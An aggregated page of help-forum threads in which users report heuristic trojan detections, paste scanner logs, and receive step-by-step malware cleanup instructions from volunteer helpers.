(I have no logs to show yet, as I've no idea what to use to procure the scan)

A:HEUR/Modified.SystemFile trojan in user32.DLL

Please go here, follow steps six, seven and eight as best you can, and then start a new thread and post accordingly.
Please include a brief description of your problem in the new thread, just to keep everything in one place, and somebody will be along as soon as they can to help.
To keep things tidy I'll lock this thread.


I keep telling KIS to quarantine this and it keeps finding it when I do a full scan. I don't know if this has fixed it or not; I'm assuming not since KIS keeps finding it.
I'd appreciate any and all help, thanks y'all.
DDS (Ver_09-06-26.01) - NTFSx86
Run by HP_Administrator at 15:38:57.86 on Mon 07/27/2009
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_13
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.958.234 [GMT -4:00]

AV: Kaspersky Internet Security *On-access scanning enabled* (Updated) {2C4D4BC6-0793-4956-A9F9-E252435469C0}
FW: Kaspersky Internet Security *enabled* {2C4D4BC6-0793-4956-A9F9-E252435469C0}

============== Running Processes ===============

C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\WINDOWS\arservice.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\CSHelper.exe
C:\Program Files\EarthLink TotalAccess\WENGINE\wmonitor.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS&#... Read more

A:Untreated: HEUR:Trojan.Win32.Generic

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll... Read more


Have Earthlink Protection Control Center which finds W32/Downloader but has no note for action. AVG has put two in virus vault this evening but more keep reappearing. AVG found viruses in svchost.exe, EPCC found virus in file A0392068.exe but I can't find it. Have done SAFE mode scans including Earthlink PCC, AVG, Spybot S&D, but more viruses kept showing up until I used a Restore point from two weeks ago and now just the few being found. Have XP Media Center Edition 2002 with SP2, Athlon 64 processor. Earthlink has kept Windows up to date. I mostly use Yahoo for email, and occasionally use Outlook Express. IE6 and Firefox browsers. Here are logs. Please advise if I missed anything.
Craig

-------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER REPORT
Tuesday, May 27, 2008 9:50:24 PM
Operating System: Microsoft Windows XP Professional, Service Pack 2 (Build 2600)
Kaspersky Online Scanner version: 5.0.98.0
Kaspersky Anti-Virus database last update: 27/05/2008
Kaspersky Anti-Virus database records: 802914
-------------------------------------------------------------------------------
Scan Settings:
Scan using the following antivirus database: extended
Scan Archives: true
Scan Mail Bases: true
Scan Target - Critical Areas:
C:\WINDOWS
C:\DOCUME~1\Owner\LOCALS~1\Temp\
Scan Statistics:
Total number of scanned objects: 29084
Number of viruses found: 2
Number of infected objects: 2
Number of suspicious o... Read more

A:Win 32/heur; Trojan Horse Downloader.generic7.csf

Welcome to Bleeping Computer, please be sure you have read and followed the Preparation Guide For Use Before Posting A Hijackthis Log, Instructions for receiving help in cleaning your computer:
http://www.bleepingcomputer.com/forums/t/34773/preparation-guide-for-use-before-using-malware-removal-tools-and-requesting-help/
All advice given is taken at your own risk.

I apologize for the wait. If your issues are not resolved, read the instructions posted above and then follow the directions below. If you no longer need help, I would appreciate a quick post letting me know so I can close your topic.

If you still need help, I first need to make you aware you have a very dangerous backdoor trojan showing in this HJT log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 9:54:53 PM, on 5/27/2008
O4 - HKLM\..\Run: [Microsoft Updates] svehost.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] svehost.exe

http://www.castlecops.com/startuplist-15211.html
http://www.sophos.com/security/analyses/vi...w32rbotgrw.html
W32/Rbot-GRW includes functionality to access the internet and communicate with a remote server via HTTP. Because of this I believe you should have this information:
How Do I Handle Possible Identity Theft, Internet Fraud and CC Fraud? http://www.dslreports.com/faq/10451
When Should I Format, How Should I Reinstall http://www.dslreports.com/faq/10063

I need to know what exactly the EarthLink Protection Control Center provides. I am seeing this: Advanced Antivirus, Firewall, SpywareBlo... Read more


My antivirus "Kaspersky" caught this trojan and said it was inactive. I am trying to learn how to remove it and I had heard you guys were WONDERFUL!! at helping people do this sort of thing.
I appreciate any help you can give me with this as it's my first time dealing with this monster!!

Thanks,
Pat
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 7:42:35 PM, on 6/9/2012
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16421)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\Common Files\Apple\Internet Services\ubd.exe
C:\Users\owner\AppData\Roaming\Smilebox\SmileboxTray.exe
C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\avp.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
C:\Program Files (x86)\Hewlett-Packard\Shared\hpqToaster.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files (x86)\H... Read more

A:HEUR:Trojan.Script.Iframer Removal


Redirection when opening Internet Explorer; haven't used it much since receiving the virus, trying not to lose my files.

DDS (Ver_09-02-01.01) - NTFSx86
Run by Daddy at 21:00:25.14 on Thu 02/26/2009
Internet Explorer: 7.0.5730.13
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1015.493 [GMT -5:00]

AV: BitDefender Antivirus *On-access scanning enabled* (Updated)
FW: BitDefender Firewall *enabled*

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
svchost.exe
svchost.exe
C:\WINDOWS\System32\wltrysvc.exe
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Common Files\InterVideo\DeviceService\DevSvc.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\WINDOWS\system32\svchost.exe -k hpdevmgmt
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
svchost.exe
C:\WINDOWS\... Read more

A:Gen:Trojan.Heur.25/ Microsoft security disabled

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

While Spybot's TeaTimer is an excellent tool for the prevention of spyware, it can sometimes prevent tools from fixing certain things.
Please disable TeaTimer for now until you are clean. TeaTimer can be re-activated once your HijackThis log is clean.
Open Spybot Search & Destroy.
In the Mode menu click "Advanced mode" if not already selected.
Choose "Yes" at the Warning prompt.
Expand the "Tools" menu.
Click "Resident".
Uncheck the "Resident "TeaTimer" (Protection of overall system settings) active." box.
If TeaTimer gives you a warning that changes were made, click the "Allow Change" box when prompted.
In the File menu click "Exit" to exit Spybot Search & Destroy.
------------------------------------------------------
Click on the attached ResetTeaTimer.zip file located at the bottom of this post.
Save it to your Desktop.
Double-click ResetTeaTimer.zip
Double-click ResetTeaTimer.bat and click Run to remove all entries set by TeaTimer... Read more


I included my post from the 'Am I Infected' section below in blue; it details what I've tried and the error msg, Kaspersky notifications I'm receiving. Here is my HiJack log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:11:02 PM, on 8/4/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0011)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\wltrysvc.exe
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\brsvc01a.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\brss01a.exe
C:\server\Apache2\bin\Apache.exe
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Microsoft SQL Server\MSSQL$MICROSOFTBCM\Binn\sqlservr.exe
C:\server\Apache2\bin\Apache.exe
C:\server\mysql\bin\mysqld-nt.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe
C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWi... Read more

A:Trojan-spy.win32.montp.h, Heur.invader, Etc

Welcome to the BleepingComputer HijackThis Logs and Analysis forum rhennessy. My name is Richie and I'll be helping you to fix your problems.

Please move HijackThis to a permanent folder on the hard drive such as C:\HJT. Create a new folder and place your HijackThis.exe inside that folder so that the backups of log changes it creates are saved in the same folder and can be used to reverse any line entry deletion if found to be necessary. If you run Hijackthis from the desktop, the files it removes will not be backed up properly.

How to create a new folder named HJT
1. Click Start/My Computer, in the 'My Computer' window, open the window in which you want to create the new folder, click on Local Disk C:
2. From the 'File' menu choose 'New'.
3. From the 'New' menu choose 'Folder'.
4. Type the folder name: HJT
5. Then press Enter.
----------------------------------------------
Viewpoint Manager is considered as foistware instead of malware since it is installed without users approval but doesn't spy or do anything "bad". This will change from what we know in 2006, read this article: http://www.clickz.com/news/article.php/3561546
You are well advised to remove the program now. Go to Start > Settings > Control Panel > Add/Remove Programs and remove the following programs if present:
Viewpoint
Viewpoint Manager
Viewpoint Media Player
Then restart your pc.
----------------------------------------------
Your version of Sun Java is out of date. Older versions have vulnerabiliti... Read more


Hello. About a week ago, my mom told me her laptop was being extremely slow. I ran a few virus scans and found HEUR:Trojan.Win32.Generic with Kaspersky's scanner. Interestingly enough, Kaspersky won't remove it. Now I am at a loss as to what to do because the computer and internet load very slowly. The internet connection (which used to be solid) works for a while, then does not work for a while, then works, etc.

**I tried to use gmer.exe, but when I ran it the first time, I got the blue screen, and whenever I ran it after, it crashed.**

DDS (Ver_09-03-16.01) - NTFSx86
Run by ak at 17:54:41.71 on Thu 05/07/2009
Internet Explorer: 7.0.6000.16830 BrowserJavaVersion: 1.6.0_13
Microsoft Windows Vista Home Basic 6.0.6000.0.1252.1.1033.18.894.108 [GMT -7:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)
AV: Kaspersky Anti-Virus *On-access scanning enabled* (Outdated)

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Program Files\AVG\AVG8\avgrsx.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe... Read more

A:Infected - HEUR:Trojan.Win32.Generic

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

I need to see a rootkit scan before I can help you.

Download RootRepeal.zip to your Desktop and click 'Extract all files' to extract the compressed file to its own folder.
Double-click on RootRepeal.exe to run it.
Click on the 'Report' tab, and then click on 'Scan'.
A window opens asking what to include in the scan.
Check the following boxes then click 'OK':
Drivers
Files
Processes
SSDT
Stealth Objects
Hidden Services
You will then be asked which drive to scan.
Check C: (or the drive your operating system is installed on, if not C:)
Click 'OK' once again.
The tool will begin scanning and may take a while to complete, so please be patient.
When the scan finishes, click on 'Save Report'.
Save the log to your desktop, using a distinctive name, such as RootRepeal.txt.
Post the log in your next reply.
------------------------------------------------------


Hello, I need help. I am trying to fix my Dell Inspiron netbook; it is infected with this virus. iexplorer.exe is running even when I don't have Internet Explorer open. I have tried running Malwarebytes, SUPERAntiSpyware, Kaspersky Virus Removal Tool (that's what found the Heur:Trojan.win32.generic). It will disconnect me from my wireless internet, runs slow, some popups, and when I am on the internet I get redirected. I don't know what to do; from what I read it's a pretty nasty rootkit and hidden very well. I have also noticed a weird folder in my C:\ drive, it is "153929ecde1b450a6e2bea79cd3c". It also has sub folders of amd64 and i386. I don't remember it being there before but I guess it could have been. I am also getting iexplore errors every 5-10 min as well. Please Help!!!
I am running winxp

A:Iexplorer.exe and Heur:trojan.win32.Generic

Somebody please help me


HI

I was running an antivirus scan and was shown a warning that I have a win32/heur infection. I googled how to get rid of it and was led to this site. I've noticed that the drivers for my touchpad mouse keep getting removed and some other background programs occasionally fail for no apparent reason. I couldn't figure out how to shut off either Norton Internet Security or AVG anti virus software for my DDS scan. I also have Windows 7 Home Student; I'm not sure whether or not it's 32 or 64 bit, but I couldn't figure out the GMER thing either.
Attach.txt (6.33KB, 1 downloads)
Here is my dds.scr log

thank you for helping me out,
let me know if you need more

.
DDS (Ver_11-03-05.01) - NTFS_AMD64
Run by Cullen at 22:45:47.03 on 28/03/2011
Internet Explorer: 8.0.7600.16385
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.2.1033.18.8046.5207 [GMT -7:00]
.
AV: Norton Internet Security *Enabled/Updated* {63DF5164-9100-186D-2187-8DC619EFD8BF}
AV: AVG Anti-Virus 2011 *Enabled/Updated* {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
SP: AVG Anti-Virus 2011 *Enabled/Updated* {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Norton Internet Security *Enabled/Updated* {D8BEB080-B73A-17E3-1B37-B6B462689202}
FW: Norton Internet Security *Enabled* {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.e... Read more

A:infected with win32/heur trojan malware

Hello toehead,

"I was running an antivirus scan and was shown a warning that I have a win32/heur infection."

Which AV reported this infection, and where does it show it located at? Did it try to clean it for you?


About a month or so ago, my computer started running really slow. I thought maybe it might just be an outdated add-on for Firefox (the browser I use), but I noticed that the slowness wasn't just happening when the browser was open. I leave my PC on when I go to bed, and noticed that when I would wake up, and then wake the computer up, it would take forever for the desktop to appear. It seemed to have cleared up about a week and a half ago. I just recently bought a used gaming steering wheel from a friend in Washington state. It came this past Tuesday. So I plugged it in, and installed the software and drivers, no problem. Then, I decided to run DriverMax and update the rest of my drivers. Once I restarted my computer, I found that my wireless adapter said I had a full connection, and excellent signal strength. When I opened Firefox however, it said "web page can not be displayed". I tried Internet Explorer, same deal. I ran every security scanning program I have, and Advanced SystemCare was the only one that found the Trojan. The weird thing is, it found it in my video drivers at the following location:
C:\NVIDIA\DisplayDriver\285.38\Winvista_Win7_64\English\setup.exe

I manually deleted the file. I still have no internet connection though. I've tried every trick I could think of, and find on the internet. Still no luck. I've come to the conclusion that I've had the Trojan for this last whole month or so,... Read more

A:Infected with Trojan.Heur & No Browser Connection

Hello Ernde38,
Welcome to the forum.
Please refrain from doing any fix or making any changes to the system from now on until we are done unless you decide you can do the rest on your own. Thank you.
If you still have the issue, please update me on the current condition of the computer and do the following.
Please download Farbar Service Scanner and run it on the computer with the issue.
Check all the boxes.
Press "Scan".
It will create a log (FSS.txt) in the same directory the tool is run.
Please copy and paste the log to your reply.
Please download MiniToolBox and save it to your desktop and run it.

Checkmark following checkboxes:
Flush DNS
Report IE Proxy Settings
Reset IE Proxy Settings
Report FF Proxy Settings
Reset FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries
List last 10 Event Viewer log
List installed programs.
List Devices (only check the box and leave the default radio button as it is).
List Restore Points.
Click Go and post the result (Result.txt) that pops up. A copy of result.txt will be saved in the same directory the tool is run.

11 more replies
Answer Match 51.24%

I started my computer the other day and everything seemed to be good, then I noticed and recognized the startup and login sound happened again. None of my installed scanners (Norton360 or MBAM) picked up anything. I used Kaspersky Rescue Disk 10 and found a threat called: HEUR.Trojan.Win32.Generic. This looks to be attached to /.../Spybot-Spyware-Doctor.Install.rw.exe I suspect that this is the cause of my problems or possibly just a part of a larger one. I also cannot find this file in the Explorer Window or by searching for it with CLI. Need help with removal, most scanners that I have tried are not finding any security threats.
 
Thanks in advance!

A:Infected: HEUR.Trojan.Win32.Generic

Hello, I see this is reported by Kaspersky to be a false positive under certain conditions. I recommend taking a deeper look. Please follow this Preparation Guide, do steps 6, 7 and 8 and post in a new topic. Let me know if all went well.

3 more replies
Answer Match 51.24%

I just have this one lingering infection.
HEUR:Trojan-Downloader.Win32.Generic

Kaspersky always identifies it at the start up and is able to delete it but for some apparent reason, it can't fully get rid of it. It appears every time I start up the PC. I will post a picture of the log.

Not sure what the aswMBR scan log is, if you elaborate I have no problem uploading it or downloading the program to get you it!
Help a brotha out!
Thank you.

-Hugo
 

A:HEUR:Trojan-Downloader.Win32.Generic

I should add that I have also completely disinfected google chrome. Unfortunately it deleted all my bookmarks, maybe someone has a method of recuperating?

AND if all comes to worse, I should also add that I have the free Windows 10 upgrade available to me. I just haven't installed it or found the need to do it.

Thanks!
 

1 more replies
Answer Match 51.24%

HOW I GOT IT:

Really stupid actually. I downloaded a file called "update.exe" from a video website requesting to update my codec from a sketchy popup. Normally red flags would fly in my head but I was running on fumes and was extremely tired. I d/l and actually checked it with bit defender and it gave the green light that the file was clean. Opened it, then bit defender went off and said Trojan.Heur was discovered and Bit Defender couldn't do anything about it (no quarantine, deletion or anything). Anyway the file I downloaded disappeared and I suspected the possibility of having it so I ran a full system scan and deep system scan overnight.

Woke up the next morning to check on the results and immediately my screen went blue screen of death, saying I needed a memory dump to prevent more damage .. . .blah blah . . . IRQ_EQUAL_TO . . . something . . .

SYMPTOMS:

After rebooting, my 1 Tb usb removable hard drive had no partition, and it asked me to format.

Then I tried to search "heur" in Google and a bunch of results came up that, when I clicked on the ones regarding trojan information, led me to websites that weren't related to the link at all (i.e. looking for trojan information and a shopping site came up - very spyware and adware like).

After a necessary reboot, bitdefender no longer is on the system icon tray upon bootup. I also have Malwarebytes Anti-Malware on the system icon tray but I can't double click on it to open it.

Just ran CCleaner... Read more

A:Trojan.Heur? - Bit defender detected but no action possible

Hello! My name is Sam and I will be helping you. In order to see what's going on with your computer I will ask for you to post various logs from the tools that we will use to resolve your issue. Please also share with me any information about how your computer is reacting and behaving each step of the way as we work through this process.

We need to create an OTListIt2 Report
Please download OTListIt2 from here
Save it to your desktop.
Double click on the icon on your desktop.
Click the "Scan All Users" checkbox.
Push the "Run Scan" button.
The scan should take just a few minutes.
Copy the log that opens up and paste it back here in your next reply.
=============
The next log will show us any hidden files that are present.
Download GMER from here:
Unzip it to the desktop.
Open the program and click on the Rootkit tab.
Make sure all the boxes on the right of the screen are checked, EXCEPT for "Show All".
Click on Scan.
When the scan has run click Copy and paste the results (if any) into this thread.

16 more replies
Answer Match 51.24%

I changed my hard drive and tried to install Win 10. There were (and still are) drivers missing but I tried to install Win 10 anyway. Installation stopped after 5-6 hours multiple times + restored the operating system back to the original Win 7. I went through many guides on how to deal with the installation problem, but none helped. I tried to install drivers from HP, but every time there was some kind of failure which caused the installation to stop. So I installed a trial of Kaspersky, and it found the trojan mentioned in the topic, but it was unable to remove it. After that I installed Spyhunter according to some advice, but it did not clean it without money. I thought 100 eur was too much for an uncertain removal attempt. So I installed HijackThis, but I did not have enough faith to auto-fix everything it suggested since there was important-sounding stuff on the list.
 
Would you please help me to get this out of my system
 
Kind regards,
 
Marko Virtanen

More replies
Answer Match 51.24%

My Windows firewall has been taken down and disabled.

Restore points appear, but when I tried a System Restore, I got an error message.

My Trend Micro anti-virus no longer works and cannot be started manually.

I downloaded the Kaspersky Virus/Malware removal tool. It found and quarantined two files labeled "Trojan program HEUR:backdoor.win32.generic".

DDS text follows:

.
DDS (Ver_2011-08-26.01) - NTFSx86
Internet Explorer: 8.0.6001.18702
Run by Harry at 16:30:59 on 2012-07-26
.
============== Running Processes ===============
.
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.nbcnews.com/
uInternet Settings,ProxyOverride = *.local
BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll
BHO: TmIEPlugInBHO Class: {1ca1377b-dc1d-4a52-9585-6e06050fac53} - c:\program files\trend micro\amsp\module\20004\2.0.1313\6.8.1078\TmIEPlg.dll
BHO: Java(tm) Plug-In SSV Helper: {761497bb-d6f0-462c-b6eb-d4daf1d92d43} - c:\program files\java\jre1.6.0_07\bin\ssv.dll
BHO: TmBpIeBHO Class: {bbacbafd-fa5e-4079-8b33-00eb9f13d4ac} - c:\program files\trend micro\amsp\module\20002\7.1.1102\7.1.1102\TmBpIe32.dll
uRun: [Steam] "e:\program files\steam\steam.exe" -silent
uRun: [SB Audigy 2 Startup Menu] "c:\program files\creative\sbaudigy2zs\program\startup menu\ChkColor.EXE"
uRun: [ISUSPM] "c:\program files\common files\installshi... Read more

A:Trojan Program HEUR:backdoor.win.32.generic

I checked System Restore again: there are no restore points available.

Harry

13 more replies
Answer Match 51.24%

I use windows xp sp2
I am protected by kaspersky internet security 2009
Kaspersky detects this trojan win32 generic, removes it and the next time I run a scan it detects the same things again

what do I do?

help
 

More replies
Answer Match 50.4%

This is the logfile. A virus alert pops up next to the clock on the task bar saying, 'Virus Alert', various pop ups randomly activate indicating a virus, and my background wall paper has been replaced with a red bio-hazard sign stating, 'Download Piracy Protection Software Now'. Notebook is also going slow.

Any help will be appreciated. Here are the logs from HijackThis.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:04: VIRUS ALERT!, on 8/28/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\CTsvcCDA.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\wscntfy.exe
C:\PROGRA~1\MOZILL~1\FIREFOX.EXE
C:\Program Files\NETGEAR\WG511v2\WG511v2.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Micr... Read more

A:Please help! Infected with Win32.Zlob and Heur.Trojan.Generic

Bump
 

1 more replies
Answer Match 50.4%

Somehow this virus made it onto my computer getting past the new 2011 Kaspersky, well now it has disabled my virus protection and I need a little help. The name of the file it is re duplicating over and over is: heuewd.sys
I managed to get into Safe mode and run the AVS utility and this is what it shows, I also ran 2 other utilities showing similar results. The problem is that the virus is locked and it will not erase, it just re-duplicates itself.

Attention !!! Database was last updated 11/23/2010 it is necessary to update the database (via File - Database update)
AVZ Antiviral Toolkit log; AVZ version is 4.36 private build
Scanning started at 08.12.2010 20:12:17
Database loaded: signatures - 282657, NN profile(s) - 2, malware removal microprograms - 56, signature database released 23.11.2010 14:50
Heuristic microprograms loaded: 386
PVS microprograms loaded: 9
Digital signatures of system files loaded: 245853
Heuristic analyzer mode: Medium heuristics mode
Malware removal mode: disabled
Windows version is: 6.0.6002, Service Pack 2 ; AVZ is run with administrator rights
System Restore: enabled
System booted in Safe Mode with Networking
1. Searching for Rootkits and other software intercepting API functions
1.1 Searching for user-mode API hooks
Analysis: kernel32.dll, export table found in section .text
Analysis: ntdll.dll, export table found in section .text
Analysis: user32.dll, export table found in section .text
Analysis: advapi32.dll, export table found in ... Read more

A:Cannot Remove virus HEUR.trojan.win32 generic

Hello and welcome to Bleeping Computer. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review your topic and do their best to resolve your issues.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.
Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Follow the instructions that pop up for post... Read more

2 more replies
Answer Match 50.4%

My normally dependable Dell, i5, Win 7 laptop suddenly began to be erratic, booting at odd times and showing strange, inappropriate error messages. A number of antivirus programs either can't load or can't run properly. I ran Kaspersky Security Scan and it reported the HEUR trojan, said "index (2) htm" was malware along with several entries it said were incorrect.

I could sure use some help with this. Any assistance will be greatly appreciated.

DDS (Ver_2012-10-19.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16421 BrowserJavaVersion: 10.7.2
Run by norm at 14:31:26 on 2012-10-18
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1033.18.3893.1668 [GMT -7:00]
.
AV: AVG Anti-Virus Free Edition 2012 *Disabled/Updated* {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
AV: Avira Desktop *Enabled/Updated* {F67B4DE5-C0B4-6C3F-0EFF-6C83BD5D0C2C}
SP: Avira Desktop *Enabled/Updated* {4D1AAC01-E68E-63B1-344F-57F1C6DA4691}
SP: AVG Anti-Virus Free Edition 2012 *Disabled/Updated* {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -... Read more

A:Kaspersky reports HEUR:Trojan.Script.Generic

Greetings Phydron and welcome to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum. My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary. If you would allow me to call you by your first name I would prefer to do that.
===================================================
Ground Rules:
First, I would also like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.

